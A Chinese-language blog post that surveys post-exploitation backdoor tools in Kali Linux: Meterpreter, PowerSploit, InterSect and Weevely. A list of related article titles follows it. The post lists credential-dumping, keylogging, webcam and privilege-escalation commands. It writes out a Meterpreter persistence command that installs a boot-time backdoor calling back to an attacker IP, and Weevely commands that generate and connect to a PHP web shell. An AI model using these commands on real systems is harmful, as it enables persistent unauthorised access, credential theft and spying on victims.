1、Meterpreter

它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。

命令        作用

sessions      查看会话ID信息

idletime     显示目标主机截止当前无操作命令的时间

webcam_snap   抓取目标主机的摄像头,将拍摄的内容保存到本地

run checkvm   检查目标主机是否是虚拟机

rdesktop     执行rdesktop -u username -p password ip 执行命令之后就会弹出一个窗口对目标进行控制

hashdump    获得密码的hash值

keylogrecorder  记录键盘信息

vnc       打开远程目标桌面

getsystem    目标系统权限提升

Meterpreter相当于攻击成功后驻留在内存中的Shellcode,为了保持长久的控制,metasplpoit提供了persistence和metsvc,模块,用于在目标为windows系统上安装开机运行或永久服务等后门。命令如下:

meterpreter>run persistence -X -i 5 -p 2000 -r 192.168.1.101          #在注册表中写入开机启动项,反向连接192.168.1.101:2000(攻击者的ip和端口) -X表示开机启动 ,-i表示反向连接间隔

meterpreter>run metsvc         #安装系统服务metsvc

2、PowerSpoit

基于PowerShell的后门集成框架。需要.Net环境支持。其主要模块:

1、CodeExecution 在目标主机执行代码

2、ScriptModification 在目标主机上创建或修改脚本

3、Persistence 设置后门,开机启动或安装服务等

4、AntivirusBypass 绕过杀毒软件

5、Exfiltration 在目标主机上进行信息搜集的工具

6、Mayhem 蓝屏等破坏性脚本

7、Recon 以目标主机为跳板进行内网侦查

3、InterSect

是一个后渗透完成多种后期任务的Python程序。它能够自动收集密码文件和网络信息,并且能够识别杀毒软件和防火墙程序。若需要使用它自动执行后期任务,需要创建自己的脚本文件,并在脚本中指定所需的各种功能,InterSect为每种功能提供对应的模块,其包含的功能模块:

1、creds 收集认证信息

2、extras 搜索操作系统和应用程序的配置文件,以检索特定的应用程序和防护程序

3、network 收集网络信息,例如服务端口和dns信息

4、lanmap 枚举在线主机并收集ip地址

5、osuser 枚举操作系统信息

6、openshares 在特定的主机上查找smb的公开共享

7、portscan 简易的端口扫描程序,可以扫描特定ip的1~1000端口

8、egressbuster 在指定的端口范围内,搜索可用的外联端口

9、privsec 检测Linux内核的系统是否存在可提权漏洞

10、xmlcrack 将哈希列表发送端远程XMLRPC,以继续破解

11、reversexor 采用异或加密的reverse shell

12、bshell 基于tcp协议的bind shell

13、rshell 基于tcp协议的reverse shell

14、xorshell 基于xor加密的bind shell

15、aeshttp 采用aes算法加密的HTTP reverse shell

16、udpbind 采用udp协议的bind shell,默认端口为 21541

17、persistent 会在系统启动时自动运行的持久型后门

4、Weevely

是一款功能强大的PHP后门工具,它使用HTTP协议包头部进行指令传输。它的使用非常简单,但仅支持php语言。

建立后门:weevely generate <password> <path> #password为自己设置的后门连接密码,path为存放生成的木马文件路径

连接后门:weevely <URL> <password> [cmd] #URL为后门地址,password为后门密码,cmd为可选项,表示要执行的命令

Kali Linux之常见后门工具介绍的更多相关文章

  1. Rsync,Linux日志及Screen工具介绍

    第十六次课 Rsync,Linux日志及Screen工具介绍 目录 一.rsync工具介绍 二.rsync常用选项 三.rsync通过ssh同步 四. rsync通过服务同步 五.linux系统日志 ...

  2. Linux 文件内容查看工具介绍-cat,less,more,tail,head

    Linux 文件内容查看工具介绍 作者:北南南北来自:LinuxSir.Org摘要: 本文讲述几种常用文件内容的查看工具,比如cat.more.less.head.tail等,把这些工具最常用的参数. ...

  3. Linux操作系统的打包/归档工具介绍

    Linux操作系统的打包/归档工具介绍 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任.

  4. Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter

    注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo.weevely.PHP Meterpreter,这类工 ...

  5. Kali linux渗透测试常用工具汇总1

    1.ProxyChains 简介:代理工具.支持HTTP/SOCKS4/SOCK5的代理服务器,允许TCP/DNS通过代理隧道. 应用场景:通过代理服务器上网. 配置:/etc/proxychains ...

  6. 关于kali linux系统的简单工具

    Linux系统中关于几个重要目录的原英文解释: /etc/: Contains configuration files of the installed tools /opt/: Contains M ...

  7. kali linux maltego-情报收集工具

    Maltego是一个交互式数据挖掘工具,它为链接分析呈现有向图.该工具用于在线调查,以发现互联网上各种来源的信息片段之间的关系. 注册Maltego账号,注册地址:https://www.paterv ...

  8. 【Linux】文本处理工具介绍

    文本处理工具介绍 grep.sed和awk都是文本处理工具,各自都有各自的优缺点,一种文本处理命令是不能被另一个完全替换的.相比较而言,sed和awk功能更强大,且已独立成一种语言来介绍. grep: ...

  9. linux /dev 常见特殊设备介绍与应用[loop,null,zero,full,random]

    linux是文件型系统,所有硬件如软件都会在对于的目录下面有相应的文件表示.对于dev这个目录,我们知道它下面的文件,表示的是linux的设备.在windows系统中,设备大家很好理解,象硬盘,磁盘指 ...

随机推荐

  1. linux复制文件到一个不存在的文件夹

    复制文件到一个不存在的文件夹时,会报错 cp -f aaa /home/admin/.m2/cp: 无法创建普通文件"/home/admin/.m2/": 是一个目录 解决的方式: ...

  2. java ee Concurrency 并发编程

    https://www.javacodegeeks.com/2014/07/java-ee-concurrency-api-tutorial.html This is a sample chapter ...

  3. 【洛谷P1903】数颜色

    题目大意:给定一个长度为 N 的序列,每个点有一个颜色.现给出 M 个操作,支持单点修改颜色和询问区间颜色数两个操作. 题解:学会了序列带修改的莫队. 莫队本身是不支持修改的.带修该莫队的本质也是对询 ...

  4. 【洛谷P2966】Cow Toll Paths

    题目大意:给定 N 个节点,M 条边的无向图,边有边权,点有点权,现给出 Q 个询问,每个询问查询两个节点之间的最短路径,这里最短路径的定义是两个节点之间的最短路径与这条路径中经过的节点点权的最大值之 ...

  5. 收集JavaScript中常用的方法函数

    本文中,收集了一些比较常用的Javascript函数,希望对学习JS的朋友们有所帮助. 1. 字符串长度截取 function cutstr(str, len) { var temp, icount ...

  6. [hdu5215][Cycle]

    题目链接 思路 首先可以通过二分图染色找到奇环和一部分偶环.这个比较简单 但是还有一种偶环容易忽略. 如图(别问我为啥没节点4) 第一次可以找到1-2-3-1)这个奇环,第二次可以找到(3-5-6-3 ...

  7. Could not install the app on the device, read the error above for details. Make sure you have an Android emulator running or a device connected and have set up your Android development environment:

    Administrator@DESKTOP-EHCTIOR MINGW64 /d/react-native-eyepetizer (master) $ react-native run-android ...

  8. Contest1592 - 2018-2019赛季多校联合新生训练赛第二场(部分题解)

    Contest1592 - 2018-2019赛季多校联合新生训练赛第二场 D 10248 修建高楼(模拟优化) H 10252 组装玩具(贪心+二分) D 传送门 题干 题目描述 C 市有一条东西走 ...

  9. springcloud使用zookeeper作为config的配置中心

    https://blog.csdn.net/CSDN_Stephen/article/details/78856323 仓库更新了,本地如何更新: 使用configserver作为配置中心: http ...

  10. python异步编程之asyncio(百万并发)

      前言:python由于GIL(全局锁)的存在,不能发挥多核的优势,其性能一直饱受诟病.然而在IO密集型的网络编程里,异步处理比同步处理能提升成百上千倍的效率,弥补了python性能方面的短板,如最 ...